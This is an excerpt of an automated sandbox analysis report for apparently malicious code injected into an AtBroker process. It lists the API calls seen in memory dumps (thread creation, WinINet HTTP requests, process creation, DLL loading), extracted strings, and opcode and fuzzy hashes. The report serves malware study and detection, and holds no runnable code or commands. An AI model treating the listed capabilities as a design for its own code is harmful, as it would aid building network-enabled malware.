2cdb602-2cdb60c 122->125 124->122 126 2cdb61d-2cdb629 125->126 127 2cdb62b-2cdb638 126->127 128 2cdb63a 126->128 127->126 128->77
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CDAE25
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID: "R$,9$.|$9V$F)$Fq$G$H$Kb$Le$U$V`$W$a@$b$e$f$m$t[$u
                                                                              • API String ID: 2422867632-2431676184
                                                                              • Opcode ID: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                                                              • Instruction ID: 7ec885ae9769a33bcc12403b0a07617781f1f2f9ad5bdbe4e409313fc1daf7c2
                                                                              • Opcode Fuzzy Hash: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                                                              • Instruction Fuzzy Hash: 42916AB0905668DBFB208F91CD58BDEBAB1BB45308F1085D8D15C3B281C7FA1A89CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: 38c14d3180c8e7b186a0ec86d74c63e70dc00fe02bef95bea9938157abcb006e
                                                                              • Instruction ID: e1d18d3310582178519e070943ea89f48c3475dc0f87224dc2c8c6d7fe3c9854
                                                                              • Opcode Fuzzy Hash: 38c14d3180c8e7b186a0ec86d74c63e70dc00fe02bef95bea9938157abcb006e
                                                                              • Instruction Fuzzy Hash: 9F315CB1601704BBD768DF64C884FE7BBA9FB88704F00462DEA5D9B245D770B604CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: fe1b2bb6a229f5d1dfd5cc016a3b6d1a0a7d82c467e262513b03d7d0f5ae6c10
                                                                              • Instruction ID: 2c6159404f0080bfe9e0363c11563e20ccae6e4cd196d69b3a6b4c817450b4f4
                                                                              • Opcode Fuzzy Hash: fe1b2bb6a229f5d1dfd5cc016a3b6d1a0a7d82c467e262513b03d7d0f5ae6c10
                                                                              • Instruction Fuzzy Hash: F6319E71641704ABDB68DF64C884FEABBB9FF84304F10466CEA1DAB245D370A614CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: 4350a02f26bc5b1f50491bc65c9c06b7d578c2e5d8c2cac3ef3ec6ad7c7f249c
                                                                              • Instruction ID: 29c48bcb9482e49c0b375984046f79d3110a200e843c4351f42c5b555215900b
                                                                              • Opcode Fuzzy Hash: 4350a02f26bc5b1f50491bc65c9c06b7d578c2e5d8c2cac3ef3ec6ad7c7f249c
                                                                              • Instruction Fuzzy Hash: CC312FB1645701ABDB68CF64C884FE6FBB9FF84304F1082ADEA1D9B284C3706610CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 02CEFF87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 2538663250-2016760708
                                                                              • Opcode ID: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
                                                                              • Instruction ID: ab15e4e508e1d4fdf6bf9906eb50c4d1540738d09fe0878224e41f65ae038414
                                                                              • Opcode Fuzzy Hash: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
                                                                              • Instruction Fuzzy Hash: 94314FB5A0060A9FDB50DFD8C8809EFB3B9FF88704F108559EA05AB205D775EE458BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                                                              • Instruction ID: e474e996a59a7f108e3c078a98eb5664fab30df018b3330a14b4465bd203526a
                                                                              • Opcode Fuzzy Hash: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                                                              • Instruction Fuzzy Hash: 56119B3150C2245FCF22AE38CD8559977B5EB86224B188A58D897C7197F736DA0BCAD0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • InternetConnectA.WININET(?,?,?,?,?,00000000,?,?), ref: 02CF9416
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ConnectInternet
                                                                              • String ID:
                                                                              • API String ID: 3050416762-0
                                                                              • Opcode ID: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                                                              • Instruction ID: 3f49fa1db5bd297aeb9fd9cd334cee47d32a179139040876428cf8e4209001e2
                                                                              • Opcode Fuzzy Hash: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                                                              • Instruction Fuzzy Hash: 4D11CBB1915119AFCF50DFA8D840EEF7BF9EF4C210F0541AAE90CE3200E634AA108BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • HttpOpenRequestA.WININET(?,?,?,?,?,00000000,?,?), ref: 02CF94A6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HttpOpenRequest
                                                                              • String ID:
                                                                              • API String ID: 1984915467-0
                                                                              • Opcode ID: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                                                              • Instruction ID: 9cca612e1c729ce77406588e80f092057bda155741d9c655b833435d401720c1
                                                                              • Opcode Fuzzy Hash: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                                                              • Instruction Fuzzy Hash: 3311BC71915119AFCB54DFA8D840EEF7BF9EF4C210F0541AAE908E3201D63499108BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • InternetOpenA.WININET(?,?,?,?,?), ref: 02CF938A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InternetOpen
                                                                              • String ID:
                                                                              • API String ID: 2038078732-0
                                                                              • Opcode ID: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                                                              • Instruction ID: 743ec517e74e75f2d4bc481667103d8db8d010ca0c5b51af3e5c19c84dda1fca
                                                                              • Opcode Fuzzy Hash: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                                                              • Instruction Fuzzy Hash: F911B171D15219AFCF50DFE8D845AFF77F9EF48210F0441AAE948E7201D6349A148BE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • HttpSendRequestA.WININET(?,?,?,?,?), ref: 02CF952A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HttpRequestSend
                                                                              • String ID:
                                                                              • API String ID: 360639707-0
                                                                              • Opcode ID: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                                                              • Instruction ID: e5520943a597e074121de8fc109bc09d47b06ef17dbd9c39f381e0ee012d7588
                                                                              • Opcode Fuzzy Hash: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                                                              • Instruction Fuzzy Hash: 4B11C371D15119AFCF54DFE8D845AEF77F9EF48210F0441AAED08E7201D6349A108BE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE5812
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                                                              • Instruction ID: 7175aac55b1c4b1e5f083e332e786ef76f495d9ab12a0d35c0811a50b3d7e39d
                                                                              • Opcode Fuzzy Hash: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                                                              • Instruction Fuzzy Hash: 11011EB9E4020DBBDF50DAE4DC41F9EB3799F48308F108195EA1997240F631EB14DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNEL32(02CE2431,02CE2459,02CE2231,00000000,02CE9093,00000010,02CE2459,?,?,00000044,02CE2459,00000010,02CE9093,00000000,02CE2231,02CE2459), ref: 02CF9023
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                              • Instruction ID: b916ea21dc706a0eba3c70cbea44858018a6c48e63ab4a6ad299ce406e71a934
                                                                              • Opcode Fuzzy Hash: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                              • Instruction Fuzzy Hash: C70196B2204608BBDB44DF99DC80EEB77EDAF8C754F158508BA1DE3240D670F8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CDAE25
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                                                              • Instruction ID: 27036a812f98c22396fccc008ca0a18721e39259d1f8c277aca2a163abebf4a0
                                                                              • Opcode Fuzzy Hash: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                                                              • Instruction Fuzzy Hash: 0CF065333506143AE37065E99C02FDB774D9B90B61F140426FB0CDB1C0D591B90246E5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000104,02CE46BC,02CF21DC,02CE46BC,?,02CF21DC,02CE46BC,00000104,02CE46BC,0000C994), ref: 02CF8F1F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                              • Instruction ID: f2a6f8c2da97dd8fbb0a24de8148e1ce6b3d2d230fb1bfde67a592c246b8a920
                                                                              • Opcode Fuzzy Hash: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                              • Instruction Fuzzy Hash: 3BE0ED756042047BD614EE99DC45FAB77ADEF89710F008419FA19A7241D771B910CBB4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,035088C0,00000007,00000000,00000004,00000000,02CE51E4,000000F0,?,?,?,?,?), ref: 02CF8F6F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                                                              • Instruction ID: 00cb382aa689c0a402053bbeb52e27b0c101d3f7040e9520b329c66420fa3f50
                                                                              • Opcode Fuzzy Hash: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                                                              • Instruction Fuzzy Hash: 1FE065B6200208BBDA10EE99DC40FAB37ADEFC9750F004409FA08A7241C671B8108AB8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008003,?,?,02CE308A,?,02CF5A17,02CF6523), ref: 02CE8F13
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                                                              • Instruction ID: b5a16e8d0d49b422206fff1d80564d13ba4baaca0c6bc29685dc1817884518a8
                                                                              • Opcode Fuzzy Hash: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                                                              • Instruction Fuzzy Hash: 94D05E722442047BFA40A6E58C0BF163A8D5B44758F094068BA0CD72C2EA55F5018966
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 02CE1FF7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                              • Instruction ID: 9f93b426e7d8602601cc81a95fcdeaf6be10194a635d37e8dabaafa2c284007b
                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                              • Instruction Fuzzy Hash: FFD0A777B0000C35AA1145846CC1EFEB71CDB845A5F004063FF08D1080D621490206B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(0000224E), ref: 02CE90FC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                                                              • Instruction ID: a264ec7f15414e37473eaf04f6a6e56a8b7a9966f972be680f1e305bb9dcfc19
                                                                              • Opcode Fuzzy Hash: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                                                              • Instruction Fuzzy Hash: 57D0A73414D2400EDF2146794C8D2B537104FC2128F184AD1E869CF1E2D332EB5AA350
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 12ed7944e2d7557da67d855495312bb4014f7cc987f42bb54f1b995dc93ee3c2
                                                                              • Instruction ID: 0c43b495994b78574a7af4e37c6f9c7f45ca9543b8c46a3e85fda41f0b02eca5
                                                                              • Opcode Fuzzy Hash: 12ed7944e2d7557da67d855495312bb4014f7cc987f42bb54f1b995dc93ee3c2
                                                                              • Instruction Fuzzy Hash: D5B09B719425C5D6FB11F760560D71779107BD1705F15C066E2030796E4738D5D1F175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 9fe9db9617a22c9a35155572ab5cddc65185c391c06be33de791bc3b79ca5fdc
                                                                              • Instruction ID: 29ff0fc9b77f1d683a871fdc38aff24e8fc7deb3241034a958a4547019f031a2
                                                                              • Opcode Fuzzy Hash: 9fe9db9617a22c9a35155572ab5cddc65185c391c06be33de791bc3b79ca5fdc
                                                                              • Instruction Fuzzy Hash: 1651E9B6B00156BFDB21DF989894A7EF7B8FB09305710C269E495D7681E234FE408BE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D346FC
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04D34787
                                                                              • ExecuteOptions, xrefs: 04D346A0
                                                                              • Execute=1, xrefs: 04D34713
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D34742
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D34655
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D34725
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: e180b9cd499c75c33202618a4f04832849e0b940240dbe42911c8ecdb19483dd
                                                                              • Instruction ID: 5519f14b0c622765a99cca9b2b64bad3e56b50709710904c9c85e8c27293b8b8
                                                                              • Opcode Fuzzy Hash: e180b9cd499c75c33202618a4f04832849e0b940240dbe42911c8ecdb19483dd
                                                                              • Instruction Fuzzy Hash: 71510971701219ABEF11AF64DC95FA977BAEF08309F0400A9D605A72D0EB74BE418F60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 8bd435353fd7ce0589d36da548426ab1cf7c2c339ea5f51eb044097e55ace24d
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: B0818070E492499EDF28CEE8C8517FEBBA5BF85310F58C55BD851AB2D0D634B8408B60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D302BD
                                                                              • RTL: Re-Waiting, xrefs: 04D3031E
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D302E7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 4b37ff977c57ebd30130f049fa6b3c9ab3d53042201c397c54cbe9c28e73a617
                                                                              • Instruction ID: 4589d4b2e38b764a6f4c0c8571e239c37f8dca9be6977a112195a543c12203d6
                                                                              • Opcode Fuzzy Hash: 4b37ff977c57ebd30130f049fa6b3c9ab3d53042201c397c54cbe9c28e73a617
                                                                              • Instruction Fuzzy Hash: 0EE1CD30604741EFE725CF29C884B2AB7E1FB89318F140A6DE5A58B2E1E774F945CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 04D37B8E
                                                                              • RTL: Re-Waiting, xrefs: 04D37BAC
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D37B7F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 450a58dcc313282490b49dd6b1ff005e96cacd102d69ac4c1fd5695bf707feb6
                                                                              • Instruction ID: 7c39c6ca24d248f7a5cf52df0b4f343747eb6562ab83a3971046231e1791f69c
                                                                              • Opcode Fuzzy Hash: 450a58dcc313282490b49dd6b1ff005e96cacd102d69ac4c1fd5695bf707feb6
                                                                              • Instruction Fuzzy Hash: 2E41E2357017029FD720DE25CC40B6AB7E6EF88715F100A2DFA5ADB680EB30F9058B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D3728C
